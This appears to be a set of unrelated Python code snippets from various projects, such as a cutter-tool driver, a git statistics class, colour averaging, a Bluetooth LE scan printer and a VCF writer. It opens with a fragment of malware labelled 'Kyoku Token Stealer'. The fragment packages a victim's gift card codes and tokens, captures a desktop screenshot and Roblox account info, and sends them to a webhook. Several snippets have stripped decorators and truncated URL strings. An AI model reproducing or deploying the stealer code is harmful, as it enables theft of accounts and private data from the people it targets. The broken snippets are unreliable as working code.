codes = json.loads(gift.text)
for code in codes:
val_codes.append((code['code'], code['promotion']['outbound_title']))
if (val_codes == []):
val += f'''
:gift: `No Gift Cards Found`
'''
elif (len(val_codes) >= 3):
num = 0
for (c, t) in val_codes:
num += 1
if (num == 3):
break
val += f'''
:gift: **{t}:**
`{c}`
[Click to copy!](
'''
else:
for (c, t) in val_codes:
val += f'''
:gift: **{t}:**
`{c}`
[Click to copy!](
'''
embed = Embed(title=username, color=5639644)
embed.add_field(name='\u200b', value=(val + '\u200b'), inline=False)
embed.set_footer(text='Kyoku Grabber | Created By errias')
embed.set_thumbnail(url=avatar)
webhook.send(embed=embed, avatar_url=' username='Kyoku Token Stealer')
self.tokens_sent += token
image = ImageGrab.grab(bbox=None, all_screens=True, include_layered_windows=False, xdisplay=None)
image.save((tempfolder + '\\image.png'))
embed2 = Embed(title='Desktop Screenshot', color=5639644)
file = File((tempfolder + '\\image.png'), filename='image.png')
embed2.set_image(url='attachment://image.png')
embed.set_footer(text='Kyoku Grabber | Created By errias')
self.robloxinfo(webhook)
webhook.send(embed=embed2, file=file, username='Kyoku Token Stealer') |
class SilhouetteCameoTool():
def __init__(self, toolholder=1):
if (toolholder is None):
toolholder = 1
self.toolholder = toolholder
def select(self):
return ('J%d' % self.toolholder)
def pressure(self, pressure):
return ('FX%d,%d' % (pressure, self.toolholder))
def speed(self, speed):
return ('!%d,%d' % (speed, self.toolholder))
def depth(self, depth):
return ('TF%d,%d' % (depth, self.toolholder))
def cutter_offset(self, xmm, ymm):
return ('FC%d,%d,%d' % (_mm_2_SU(xmm), _mm_2_SU(ymm), self.toolholder))
def lift(self, lift):
if lift:
return ('FE1,%d' % self.toolholder)
else:
return ('FE0,%d' % self.toolholder)
def sharpen_corners(self, start, end):
return [('FF%d,0,%d' % (start, self.toolholder)), ('FF%d,%d,%d' % (start, end, self.toolholder))] |
def fetch_event_invoices(invoice_status):
if (invoice_status == 'due'):
event_invoices = EventInvoice.query.filter(((EventInvoice.created_at + datetime.timedelta(days=30)) <= datetime.datetime.now()), (EventInvoice.paid_via is None)).all()
elif (invoice_status == 'paid'):
event_invoices = EventInvoice.query.filter((EventInvoice.paid_via is not None)).all()
elif (invoice_status == 'upcoming'):
event_invoices = EventInvoice.query.filter(((EventInvoice.created_at + datetime.timedelta(days=30)) > datetime.datetime.now()), (EventInvoice.paid_via is None)).all()
return event_invoices |
class Changes(object):
authors = {}
authors_dateinfo = {}
authors_by_email = {}
emails_by_author = {}
def __init__(self, repo, hard):
self.commits = []
interval.set_ref('HEAD')
git_rev_list_p = subprocess.Popen(filter(None, ['git', 'rev-list', '--reverse', '--no-merges', interval.get_since(), interval.get_until(), 'HEAD']), bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
lines = git_rev_list_p.communicate()[0].splitlines()
git_rev_list_p.stdout.close()
if ((git_rev_list_p.returncode == 0) and (len(lines) > 0)):
progress_text = _(PROGRESS_TEXT)
if (repo != None):
progress_text = (('[%s] ' % repo.name) + progress_text)
chunks = (len(lines) // CHANGES_PER_THREAD)
self.commits = ([None] * (chunks if ((len(lines) % CHANGES_PER_THREAD) == 0) else (chunks + 1)))
first_hash = ''
for (i, entry) in enumerate(lines):
if ((i % CHANGES_PER_THREAD) == (CHANGES_PER_THREAD - 1)):
entry = entry.decode('utf-8', 'replace').strip()
second_hash = entry
ChangesThread.create(hard, self, first_hash, second_hash, i)
first_hash = (entry + '..')
if format.is_interactive_format():
terminal.output_progress(progress_text, i, len(lines))
else:
if ((CHANGES_PER_THREAD - 1) != (i % CHANGES_PER_THREAD)):
entry = entry.decode('utf-8', 'replace').strip()
second_hash = entry
ChangesThread.create(hard, self, first_hash, second_hash, i)
for i in range(0, NUM_THREADS):
__thread_lock__.acquire()
for i in range(0, NUM_THREADS):
__thread_lock__.release()
self.commits = [item for sublist in self.commits for item in sublist]
if (len(self.commits) > 0):
if interval.has_interval():
interval.set_ref(self.commits[(- 1)].sha)
self.first_commit_date = datetime.date(int(self.commits[0].date[0:4]), int(self.commits[0].date[5:7]), int(self.commits[0].date[8:10]))
self.last_commit_date = datetime.date(int(self.commits[(- 1)].date[0:4]), int(self.commits[(- 1)].date[5:7]), int(self.commits[(- 1)].date[8:10]))
def __iadd__(self, other):
try:
self.authors.update(other.authors)
self.authors_dateinfo.update(other.authors_dateinfo)
self.authors_by_email.update(other.authors_by_email)
self.emails_by_author.update(other.emails_by_author)
for commit in other.commits:
bisect.insort(self.commits, commit)
if ((not self.commits) and (not other.commits)):
self.commits = []
return self
except AttributeError:
return other
def get_commits(self):
return self.commits
def modify_authorinfo(authors, key, commit):
if (authors.get(key, None) == None):
authors[key] = AuthorInfo()
if commit.get_filediffs():
authors[key].commits += 1
for j in commit.get_filediffs():
authors[key].insertions += j.insertions
authors[key].deletions += j.deletions
def get_authorinfo_list(self):
if (not self.authors):
for i in self.commits:
Changes.modify_authorinfo(self.authors, i.author, i)
return self.authors
def get_authordateinfo_list(self):
if (not self.authors_dateinfo):
for i in self.commits:
Changes.modify_authorinfo(self.authors_dateinfo, (i.date, i.author), i)
return self.authors_dateinfo
def get_latest_author_by_email(self, name):
if (not hasattr(name, 'decode')):
name = str.encode(name)
try:
name = name.decode('unicode_escape', 'ignore')
except UnicodeEncodeError:
pass
return self.authors_by_email[name]
def get_latest_email_by_author(self, name):
return self.emails_by_author[name] |
def average(create: type[Color], colors: Iterable[ColorInput], space: str, premultiplied: bool=True, powerless: bool=False) -> Color:
obj = create(space, [])
cs = obj.CS_MAP[space]
hue_index = (cs.hue_index() if hasattr(cs, 'hue_index') else (- 1))
channels = cs.channels
chan_count = len(channels)
alpha_index = (chan_count - 1)
sums = ([0.0] * chan_count)
totals = ([0.0] * chan_count)
sin = 0.0
cos = 0.0
i = (- 1)
for c in colors:
obj.update(c)
if (powerless and (hue_index >= 0) and (not math.isnan(obj[hue_index])) and obj.is_achromatic()):
obj[hue_index] = math.nan
coords = obj[:]
alpha = coords[(- 1)]
if math.isnan(alpha):
alpha = 1.0
i = 0
for coord in coords:
if (not math.isnan(coord)):
totals[i] += 1
if (i == hue_index):
rad = math.radians(coord)
sin += math.sin(rad)
cos += math.cos(rad)
else:
sums[i] += ((coord * alpha) if (premultiplied and (i != alpha_index)) else coord)
i += 1
if (i == (- 1)):
raise ValueError('At least one color must be provided in order to average colors')
alpha = sums[(- 1)]
alpha_t = totals[(- 1)]
sums[(- 1)] = (math.nan if (not alpha_t) else (alpha / alpha_t))
alpha = sums[(- 1)]
if (math.isnan(alpha) or (alpha in (0.0, 1.0))):
alpha = 1.0
for i in range((chan_count - 1)):
total = totals[i]
if (not total):
sums[i] = math.nan
elif (i == hue_index):
avg_theta = math.degrees(math.atan2((sin / total), (cos / total)))
sums[i] = ((avg_theta + 360) if (avg_theta < 0) else avg_theta)
else:
sums[i] /= ((total * alpha) if premultiplied else total)
return obj.update(space, sums[:(- 1)], sums[(- 1)]) |
class LeDevicesScanResult(ScanResult):
def __init__(self) -> None:
super().__init__('LE Devices')
self.devices_info = []
def add_device_info(self, info: LeDeviceInfo):
self.devices_info.append(info)
def print(self):
for dev_info in self.devices_info:
print('Addr: ', blue(dev_info.addr), ((('(' + bdaddr_to_company_name(dev_info.addr)) + ')') if (dev_info.addr_type == 'public') else ''))
print('Addr type: ', blue(dev_info.addr_type))
print('Connectable:', (green('True') if dev_info.connectable else red('False')))
print('RSSI: {} dBm'.format(dev_info.rssi))
print('General Access Profile:')
for ad in dev_info.ad_structs:
try:
type_names = gap_type_names[ad.type]
except KeyError:
type_names = ((('0x{:02X} '.format(ad.type) + '(') + red('Unknown')) + ')')
print((INDENT + '{}: '.format(type_names)), end='')
if ((ad.type == COMPLETE_LIST_OF_16_BIT_SERVICE_CLASS_UUIDS) or (ad.type == INCOMPLETE_LIST_OF_16_BIT_SERVICE_CLASS_UUIDS)):
print()
for uuid in ad.value.split(','):
if (len(uuid) == 36):
print(((INDENT * 2) + blue(('0x' + uuid[4:8].upper()))))
else:
print(((INDENT * 2) + blue(uuid)))
elif ((ad.type == COMPLETE_LIST_OF_32_BIT_SERVICE_CLASS_UUIDS) or (ad.type == INCOMPLETE_LIST_OF_32_BIT_SERVICE_CLASS_UUIDS)):
print()
for uuid in ad.value.split(','):
if (len(uuid) == 36):
print(((INDENT * 2) + blue(('0x' + uuid[0:8].upper()))))
else:
print(((INDENT * 2) + blue(uuid)))
elif ((ad.type == COMPLETE_LIST_OF_128_BIT_SERVICE_CLASS_UUIDS) or (ad.type == INCOMPLETE_LIST_OF_128_BIT_SERVICE_CLASS_UUIDS)):
print()
for uuid in ad.value.split(','):
print(((INDENT * 2) + blue(uuid).upper()))
elif (ad.type == SERVICE_DATA_16_BIT_UUID):
print()
print(((INDENT * 2) + 'UUID: 0x{}'.format(ad.value[0:(2 * 2)].upper())))
print(((INDENT * 2) + 'Data:'), ad.value[(2 * 2):])
elif (ad.type == SERVICE_DATA_32_BIT_UUID):
print()
print(((INDENT * 2) + 'UUID: {}'.format(ad.value[0:(4 * 2)].upper())))
print(((INDENT * 2) + 'Data:'), ad.value[(4 * 2):])
elif (ad.type == SERVICE_DATA_128_BIT_UUID):
print()
print(((INDENT * 2) + 'UUID: {}'.format(ad.value[0:(16 * 2)].upper())))
print(((INDENT * 2) + 'Data: '), ad.value[(16 * 2):])
elif (ad.type == FLAGS):
print()
try:
value = bytes.fromhex(ad.value)
print((((INDENT * 2) + 'LE Limited Discoverable Mode\n') if (value[0] & 1) else ''), end='')
print((((INDENT * 2) + 'LE General Discoverable Mode\n') if (value[0] & 2) else ''), end='')
print((((INDENT * 2) + 'BR/EDR Not Supported\n') if (value[0] & 4) else ''), end='')
print((((INDENT * 2) + 'Simultaneous LE + BR/EDR to Same Device Capable (Controller)\n') if (value[0] & 8) else ''), end='')
print((((INDENT * 2) + 'Simultaneous LE + BR/EDR to Same Device Capable (Host)\n') if (value[0] & 16) else ''), end='')
except (ValueError, IndexError) as e:
logger.debug('LeDevicesScanResult.print(), parse ad.type == FLAGS')
print(ad.value, (('(' + red('Raw')) + ')'))
elif (ad.type == MANUFACTURER_SPECIFIC_DATA):
value = bytes.fromhex(ad.value)
company_id = int.from_bytes(value[0:2], 'little', signed=False)
try:
company_name = blue(company_names[company_id])
except KeyError:
company_name = red('Unknown')
if (len(value) >= 2):
print()
print(((INDENT * 2) + 'Company ID:'), '0x{:04X} ({})'.format(company_id, company_name))
try:
print(((INDENT * 2) + 'Data: '), ''.join(['{:02X}'.format(b) for b in value[2:]]))
except IndexError:
print(((INDENT * 2) + 'Data:'), None)
else:
print(value)
elif (ad.type == TX_POWER_LEVEL):
value = int.from_bytes(bytes.fromhex(ad.value), 'little', signed=True)
print(value, 'dBm', '(pathloss {} dBm)'.format((value - dev_info.rssi)))
else:
print(ad.value)
print()
print()
def store(self):
with open(LE_DEVS_SCAN_RESULT_CACHE, 'wb') as result_file:
pickle.dump(self, result_file) |
class Taichi(TreatAs, Skill):
skill_category = ['character', 'active']
def treat_as(self):
cl = self.associated_cards
if (not cl):
return DummyCard
c = cl[0]
if c.is_card(GrazeCard):
return AttackCard
if c.is_card(AttackCard):
return GrazeCard
return DummyCard
def check(self):
cl = self.associated_cards
if ((not cl) or (len(cl) != 1)):
return False
c = cl[0]
if (not (c.is_card(AttackCard) or c.is_card(GrazeCard))):
return False
return ((c.resides_in is not None) and (c.resides_in.type in ('cards', 'showncards'))) |
def write_final_vcf(int_duplication_candidates, inversion_candidates, tandem_duplication_candidates, deletion_candidates, novel_insertion_candidates, breakend_candidates, version, contig_names, contig_lengths, types_to_output, options):
vcf_output = open((options.working_dir + '/variants.vcf'), 'w')
print('##fileformat=VCFv4.2', file=vcf_output)
print('##fileDate={0}'.format(time.strftime('%Y-%m-%d|%I:%M:%S%p|%Z|%z')), file=vcf_output)
print('##source=SVIM-v{0}'.format(version), file=vcf_output)
for (contig_name, contig_length) in zip(contig_names, contig_lengths):
print('##contig=<ID={0},length={1}>'.format(contig_name, contig_length), file=vcf_output)
if ('DEL' in types_to_output):
print('##ALT=<ID=DEL,Description="Deletion">', file=vcf_output)
if ('INV' in types_to_output):
print('##ALT=<ID=INV,Description="Inversion">', file=vcf_output)
if (((not options.tandem_duplications_as_insertions) and ('DUP:TANDEM' in types_to_output)) or ((not options.interspersed_duplications_as_insertions) and ('DUP:INT' in types_to_output))):
print('##ALT=<ID=DUP,Description="Duplication">', file=vcf_output)
if ((not options.tandem_duplications_as_insertions) and ('DUP:TANDEM' in types_to_output)):
print('##ALT=<ID=DUP:TANDEM,Description="Tandem Duplication">', file=vcf_output)
if ((not options.interspersed_duplications_as_insertions) and ('DUP:INT' in types_to_output)):
print('##ALT=<ID=DUP:INT,Description="Interspersed Duplication">', file=vcf_output)
if ('INS' in types_to_output):
print('##ALT=<ID=INS,Description="Insertion">', file=vcf_output)
if ('BND' in types_to_output):
print('##ALT=<ID=BND,Description="Breakend">', file=vcf_output)
print('##INFO=<ID=SVTYPE,Number=1,Type=String,Description="Type of structural variant">', file=vcf_output)
print('##INFO=<ID=CUTPASTE,Number=0,Type=Flag,Description="Genomic origin of interspersed duplication seems to be deleted">', file=vcf_output)
print('##INFO=<ID=END,Number=1,Type=Integer,Description="End position of the variant described in this record">', file=vcf_output)
print('##INFO=<ID=SVLEN,Number=1,Type=Integer,Description="Difference in length between REF and ALT alleles">', file=vcf_output)
print('##INFO=<ID=SUPPORT,Number=1,Type=Integer,Description="Number of reads supporting this variant">', file=vcf_output)
print('##INFO=<ID=STD_SPAN,Number=1,Type=Float,Description="Standard deviation in span of merged SV signatures">', file=vcf_output)
print('##INFO=<ID=STD_POS,Number=1,Type=Float,Description="Standard deviation in position of merged SV signatures">', file=vcf_output)
print('##INFO=<ID=STD_POS1,Number=1,Type=Float,Description="Standard deviation of breakend 1 position">', file=vcf_output)
print('##INFO=<ID=STD_POS2,Number=1,Type=Float,Description="Standard deviation of breakend 2 position">', file=vcf_output)
if options.insertion_sequences:
print('##INFO=<ID=SEQS,Number=.,Type=String,Description="Insertion sequences from all supporting reads">', file=vcf_output)
if options.read_names:
print('##INFO=<ID=READS,Number=.,Type=String,Description="Names of all supporting reads">', file=vcf_output)
if options.zmws:
print('##INFO=<ID=ZMWS,Number=1,Type=Integer,Description="Number of supporting ZMWs (PacBio only)">', file=vcf_output)
print('##FILTER=<ID=hom_ref,Description="Genotype is homozygous reference">', file=vcf_output)
print('##FILTER=<ID=not_fully_covered,Description="Tandem duplication is not fully covered by a single read">', file=vcf_output)
print('##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">', file=vcf_output)
print('##FORMAT=<ID=DP,Number=1,Type=Integer,Description="Read depth">', file=vcf_output)
print('##FORMAT=<ID=AD,Number=R,Type=Integer,Description="Read depth for each allele">', file=vcf_output)
if ((not options.tandem_duplications_as_insertions) and ('DUP:TANDEM' in types_to_output)):
print('##FORMAT=<ID=CN,Number=1,Type=Integer,Description="Copy number of tandem duplication (e.g. 2 for one additional copy)">', file=vcf_output)
print(('#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\t' + options.sample), file=vcf_output)
sequence_alleles = (not options.symbolic_alleles)
if sequence_alleles:
try:
reference = FastaFile(options.genome)
except ValueError:
logging.warning('The given reference genome is missing an index file ({path}.fai). Sequence alleles cannot be retrieved.'.format(options.genome))
sequence_alleles = False
except IOError:
logging.warning('The given reference genome is missing ({path}). Sequence alleles cannot be retrieved.'.format(options.genome))
sequence_alleles = False
else:
reference = None
vcf_entries = []
if ('DEL' in types_to_output):
for candidate in deletion_candidates:
vcf_entries.append((candidate.get_source(), candidate.get_vcf_entry(sequence_alleles, reference, options.read_names, options.zmws), 'DEL'))
if ('INV' in types_to_output):
for candidate in inversion_candidates:
vcf_entries.append((candidate.get_source(), candidate.get_vcf_entry(sequence_alleles, reference, options.read_names, options.zmws), 'INV'))
if ('INS' in types_to_output):
for candidate in novel_insertion_candidates:
vcf_entries.append((candidate.get_destination(), candidate.get_vcf_entry(sequence_alleles, reference, options.insertion_sequences, options.read_names, options.zmws), 'INS'))
if options.tandem_duplications_as_insertions:
if ('INS' in types_to_output):
for candidate in tandem_duplication_candidates:
vcf_entries.append((candidate.get_destination(), candidate.get_vcf_entry_as_ins(sequence_alleles, reference, options.read_names, options.zmws), 'INS'))
elif ('DUP:TANDEM' in types_to_output):
for candidate in tandem_duplication_candidates:
vcf_entries.append((candidate.get_source(), candidate.get_vcf_entry_as_dup(options.read_names, options.zmws), 'DUP_TANDEM'))
if options.interspersed_duplications_as_insertions:
if ('INS' in types_to_output):
for candidate in int_duplication_candidates:
vcf_entries.append((candidate.get_destination(), candidate.get_vcf_entry_as_ins(sequence_alleles, reference, options.read_names, options.zmws), 'INS'))
elif ('DUP:INT' in types_to_output):
for candidate in int_duplication_candidates:
vcf_entries.append((candidate.get_source(), candidate.get_vcf_entry_as_dup(options.read_names, options.zmws), 'DUP_INT'))
if ('BND' in types_to_output):
for candidate in breakend_candidates:
vcf_entries.append(((candidate.get_source()[0], candidate.get_source()[1], (candidate.get_source()[1] + 1)), candidate.get_vcf_entry(options.read_names, options.zmws), 'BND'))
vcf_entries.append(((candidate.get_destination()[0], candidate.get_destination()[1], (candidate.get_destination()[1] + 1)), candidate.get_vcf_entry_reverse(options.read_names, options.zmws), 'BND'))
if sequence_alleles:
reference.close()
svtype_counter = defaultdict(int)
for (source, entry, svtype) in sorted_nicely(vcf_entries):
variant_id = 'svim.{svtype}.{number}'.format(svtype=svtype, number=(svtype_counter[svtype] + 1))
entry_with_id = entry.replace('PLACEHOLDERFORID', variant_id, 1)
svtype_counter[svtype] += 1
print(entry_with_id, file=vcf_output)
vcf_output.close() |
class qwEditMask(QtWidgets.QWidget):
valueChanged = pyqtSignal(int)
def __init__(self, parent=None):
super().__init__(parent)
self.__changeEnCours = False
self.__nbAxes = 6
self.frame = QtWidgets.QFrame()
self.frame.setMinimumSize(QtCore.QSize(127, 19))
self.frame.setMaximumSize(QtCore.QSize(127, 19))
self.frame.setObjectName('frame')
self.horizontalLayout = QtWidgets.QHBoxLayout(self.frame)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setSpacing(2)
self.horizontalLayout.setObjectName('horizontalLayout')
self.chk = []
for i in range(6):
self.chk.append(QtWidgets.QCheckBox(self.frame))
self.chk[i].setLayoutDirection(QtCore.Qt.RightToLeft)
self.chk[i].setText('')
self.chk[i].setObjectName('chk{}'.format(i))
self.horizontalLayout.addWidget(self.chk[i])
self.chk[i].stateChanged.connect(self.chkStateChange)
self.lneMask = QtWidgets.QLineEdit(self.frame)
self.lneMask.setMinimumSize(QtCore.QSize(31, 19))
self.lneMask.setMaximumSize(QtCore.QSize(31, 19))
self.lneMask.setAlignment(((QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing) | QtCore.Qt.AlignVCenter))
self.lneMask.setObjectName('lneMask')
self.lneMask.setText('0')
validator = QIntValidator(0, 63, self)
self.lneMask.setValidator(validator)
self.horizontalLayout.addWidget(self.lneMask)
self.lneMask.textChanged.connect(self.lneTextChanged)
self.setLayout(self.horizontalLayout)
(int)
def chkStateChange(self, value):
if (not self.__changeEnCours):
self.__changeEnCours = True
newVal = 0
for i in range(6):
if self.chk[i].isChecked():
newVal += (2 ** i)
self.lneMask.setText(format(newVal))
self.valueChanged.emit(newVal)
self.__changeEnCours = False
(str)
def lneTextChanged(self, txt: str):
if (not self.__changeEnCours):
self.__changeEnCours = True
try:
newVal = int(txt)
except ValueError as e:
self.lneMask.setText('0')
newVal = 0
for i in range(6):
if (newVal & (2 ** i)):
self.chk[i].setCheckState(Qt.Checked)
else:
self.chk[i].setCheckState(Qt.Unchecked)
self.valueChanged.emit(newVal)
self.__changeEnCours = False
()
def getValue(self):
return int(self.lneMask.text())
(int)
def setValue(self, val: int):
self.lneMask.setText(format(val))
value = QtCore.pyqtProperty(int, fget=getValue, fset=setValue)
()
def getNbAxes(self):
return self.__nbAxes
(int)
def setNbAxes(self, val: int):
if ((val < 3) or (val > 6)):
raise RuntimeError(self.tr('The number of axis should be between 3 and 6!'))
self.__nbAxes = val
for i in range(6):
if (i < val):
self.chk[i].setEnabled(True)
else:
self.chk[i].setEnabled(False)
nbAxes = QtCore.pyqtProperty(int, fget=getNbAxes, fset=setNbAxes) |
def test_extract_specified_datetime_features(df_datetime, df_datetime_transformed):
X = DatetimeFeatures(features_to_extract=['semester', 'week']).fit_transform(df_datetime)
pd.testing.assert_frame_equal(X, df_datetime_transformed[(vars_non_dt + [((var + '_') + feat) for var in vars_dt for feat in ['semester', 'week']])], check_dtype=False)
X = DatetimeFeatures(features_to_extract=['hour', 'day_of_week']).fit_transform(df_datetime)
pd.testing.assert_frame_equal(X, df_datetime_transformed[(vars_non_dt + [((var + '_') + feat) for var in vars_dt for feat in ['hour', 'day_of_week']])], check_dtype=False) |
def gen_sites(desired_site_type):
db = Database(util.get_db_root(), util.get_part())
grid = db.grid()
for tile_name in sorted(grid.tiles()):
loc = grid.loc_of_tilename(tile_name)
gridinfo = grid.gridinfo_at_loc(loc)
for (site, site_type) in gridinfo.sites.items():
if (site_type == desired_site_type):
(yield site) |
class ABI():
def __init__(self, *args, **kwargs):
self.contract = kwargs['contract']
self.proj_path = kwargs['proj_path']
self.constructor = Method(**kwargs['Constructor'])
self.payable = kwargs['payable']
self.methods = [Method(**method) for method in kwargs['Methods'].values()]
compiled_json_path = os.path.join(self.proj_path, 'build', 'contracts', '{}.json'.format(self.contract.name))
with open(compiled_json_path) as compiled_json_f:
compiled_json = json.load(compiled_json_f)
abi_json = compiled_json['abi']
for item in abi_json:
if (item['type'] == 'fallback'):
self.methods.append(Method(Name=Method.FALLBACK, ID=None, Const=False, Inputs=None, Outputs=None))
if item['payable']:
self.payable[Method.FALLBACK] = True
else:
self.payable[Method.FALLBACK] = False
self.methods_by_name = dict()
self.methods_by_idd = dict()
for method in self.methods:
self.methods_by_name[method.name] = method
self.methods_by_idd[method.idd] = method |
class FlicketPost(PaginatedAPIMixin, Base):
__tablename__ = 'flicket_post'
id = db.Column(db.Integer, primary_key=True)
ticket_id = db.Column(db.Integer, db.ForeignKey(FlicketTicket.id))
ticket = db.relationship(FlicketTicket, back_populates='posts')
content = db.Column(db.String(field_size['content_max_length']))
user_id = db.Column(db.Integer, db.ForeignKey(FlicketUser.id))
user = db.relationship(FlicketUser, foreign_keys='FlicketPost.user_id')
date_added = db.Column(db.DateTime())
date_modified = db.Column(db.DateTime())
modified_id = db.Column(db.Integer, db.ForeignKey(FlicketUser.id))
modified = db.relationship(FlicketUser, foreign_keys='FlicketPost.modified_id')
hours = db.Column(db.Numeric(10, 2), server_default='0')
uploads = db.relationship('FlicketUploads', primaryjoin='and_(FlicketPost.id == FlicketUploads.posts_id)')
actions = db.relationship('FlicketAction', primaryjoin='FlicketPost.id == FlicketAction.post_id')
def to_dict(self):
data = {'id': self.id, 'content': self.content, 'data_added': self.date_added, 'date_modified': self.date_modified, 'ticket_id': self.ticket_id, 'user_id': self.user_id, 'links': {'self': (app.config['base_url'] + url_for('bp_api.get_post', id=self.id)), 'created_by': (app.config['base_url'] + url_for('bp_api.get_user', id=self.user_id)), 'posts': (app.config['base_url'] + url_for('bp_api.get_posts', ticket_id=self.ticket_id))}}
return data
def __repr__(self):
return '<FlicketPost: id={}, ticket_id={}, content={}>'.format(self.id, self.ticket_id, self.content) |
class Client(UMsgPacker):
def __init__(self, host, port, connection_handler_class=None):
if DEBUG:
sys.stderr.write(('Connecting to server at: %s (%s)\n' % (host, port)))
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.connect((host, port))
if connection_handler_class:
connection_handler = self.connection_handler = connection_handler_class(self._sock)
connection_handler.start()
def get_host_port(self):
try:
return self._sock.getsockname()
except:
return (None, None)
def is_alive(self):
try:
self._sock.getsockname()
return True
except:
return False
def send(self, obj):
s = self._sock
if (s is None):
raise RuntimeError('Connection already closed')
self._sock.sendall(self.pack_obj(obj))
def shutdown(self):
s = self._sock
if (self._sock is None):
return
self._sock = None
try:
s.shutdown(socket.SHUT_RDWR)
except:
pass
try:
s.close()
except:
pass |
class Param():
def __init__(self, defs):
self._defs = defs
self._type = None
if ((self.type.values == [False, True]) or (self.type.values == [True, False])):
self._type = Bool(self)
def name(self):
return self._defs.get('name')
def documentation(self):
return cleanup(self._defs.get('documentation', ''))
def python_default(self):
return repr(self.type.python_default).replace("'", '"')
def yaml_default(self):
return self.type.yaml_default
def type(self):
if (self._type is None):
t = self._defs.get('to')
if t.startswith('No'):
t = 'Bool'
if (('colour' in self.name) and (t == 'stringarray')):
t = 'ColourList'
t = t.replace('array', 'List')
t = (t[0].upper() + t[1:])
if (('values' in self._defs) or (t in ENUMS)):
t = 'Enum'
if self._defs.get('option'):
t = 'Enum'
if (('latitude' in self.name) and (t != 'String')):
t = 'Latitude'
if (('longitude' in self.name) and (t != 'String')):
t = 'Longitude'
if (t not in globals()):
print(t, self.name, file=sys.stderr)
self._type = globals().get(t, String)(self)
return self._type
def python_values(self):
values = self.type.values
if (values is not None):
return ', '.join([repr(x).replace("'", '"') for x in values])
return self.python_type
def yaml_values(self):
return self.type.values
def yaml_type(self):
return self.type.yaml_type
def python_type(self):
return self.type.python_type
def json_schema(self):
return self.type.json_schema |
class Migration(migrations.Migration):
dependencies = [('frontend', '0075_auto__2012')]
operations = [migrations.CreateModel(name='STP', fields=[('code', models.CharField(max_length=3, primary_key=True, serialize=False)), ('name', models.CharField(blank=True, max_length=200, null=True)), ('regional_team', models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='frontend.RegionalTeam'))]), migrations.AddField(model_name='measurevalue', name='stp', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='frontend.STP')), migrations.AddField(model_name='pct', name='stp', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='frontend.STP'))] |
def _migrate_summary_info(data_file: DataFile, ens_config: EnsembleConfig) -> List[ResponseConfig]:
seen = set()
for block in data_file.blocks(Kind.SUMMARY):
if (block.name in seen):
continue
seen.add(block.name)
return ([ens_config['summary']] if seen else []) |
def info_aubio(fp):
info = {}
with aubio.source(fp) as f:
info['duration'] = (f.duration / f.samplerate)
with aubio.source(fp) as f:
info['samples'] = f.duration
with aubio.source(fp) as f:
info['channels'] = f.channels
with aubio.source(fp) as f:
info['sampling_rate'] = f.samplerate
return info |
_renderer(wrap_type=ClassificationProbDistribution)
class ClassificationProbDistributionRenderer(MetricRenderer):
def _plot(self, distribution: Dict[(str, list)]):
graphs = []
for label in distribution:
pred_distr = ff.create_distplot(distribution[label], [str(label), 'other'], colors=[self.color_options.primary_color, self.color_options.secondary_color], bin_size=0.05, show_curve=False, show_rug=True)
pred_distr.update_layout(xaxis_title='Probability', yaxis_title='Share', legend=dict(orientation='h', yanchor='bottom', y=1.02, xanchor='right', x=1))
pred_distr_json = pred_distr.to_plotly_json()
graphs.append({'title': str(label), 'data': pred_distr_json['data'], 'layout': pred_distr_json['layout']})
return graphs
def render_html(self, obj: ClassificationProbDistribution) -> List[BaseWidgetInfo]:
metric_result = obj.get_result()
reference_distribution = metric_result.reference_distribution
current_distribution = metric_result.current_distribution
result = []
size = WidgetSize.FULL
if (reference_distribution is not None):
size = WidgetSize.HALF
if (current_distribution is not None):
result.append(plotly_graph_tabs(title='Current: Probability Distribution', size=size, figures=[GraphData(graph['title'], graph['data'], graph['layout']) for graph in self._plot(current_distribution)]))
if (reference_distribution is not None):
result.append(plotly_graph_tabs(title='Reference: Probability Distribution', size=size, figures=[GraphData(graph['title'], graph['data'], graph['layout']) for graph in self._plot(reference_distribution)]))
return result |
def get_basemesh_nodes(W):
(pstart, pend) = W.mesh().topology_dm.getChart()
section = W.dm.getDefaultSection()
basemeshoff = numpy.empty((pend - pstart), dtype=IntType)
basemeshdof = numpy.empty((pend - pstart), dtype=IntType)
basemeshlayeroffset = numpy.empty((pend - pstart), dtype=IntType)
layer_offsets = numpy.full(W.node_set.total_size, (- 1), dtype=IntType)
layer_offsets[W.cell_node_map().values_with_halo] = W.cell_node_map().offset
nlayers = W.mesh().layers
for p in range(pstart, pend):
dof = section.getDof(p)
off = section.getOffset(p)
if (dof == 0):
dof_per_layer = 0
layer_offset = 0
else:
layer_offset = layer_offsets[off]
assert (layer_offset >= 0)
dof_per_layer = (dof - ((nlayers - 1) * layer_offset))
basemeshoff[(p - pstart)] = off
basemeshdof[(p - pstart)] = dof_per_layer
basemeshlayeroffset[(p - pstart)] = layer_offset
return (basemeshoff, basemeshdof, basemeshlayeroffset) |
def test_A_fails_with_incorrect_dict():
correct_d = {'terms': {'field': 'tags'}, 'aggs': {'per_author': {'terms': {'field': 'author.raw'}}}}
with raises(Exception):
aggs.A(correct_d, field='f')
d = correct_d.copy()
del d['terms']
with raises(Exception):
aggs.A(d)
d = correct_d.copy()
d['xx'] = {}
with raises(Exception):
aggs.A(d) |
def arm_infer_functions(functions):
if functions.binary.sections.has_sec(INIT):
init_sec_addr = functions.binary.sections.get_sec(INIT).addr
if functions.is_lowpc_function(init_sec_addr):
_init = functions.get_function_by_lowpc(init_sec_addr)
_init.name = '_init'
_init.train_name = '_init'
_init.test_name = '_init'
_init.is_name_given = True
_init.is_run_init = False
if functions.binary.sections.has_sec(FINI):
fini_sec_addr = functions.binary.sections.get_sec(FINI).addr
if functions.is_lowpc_function(fini_sec_addr):
_fini = functions.get_function_by_lowpc(fini_sec_addr)
_fini.name = '_fini'
_fini.train_name = '_fini'
_fini.test_name = '_fini'
_fini.is_name_given = True
_fini.is_run_init = False
if functions.is_lowpc_function(functions.binary.entry_point):
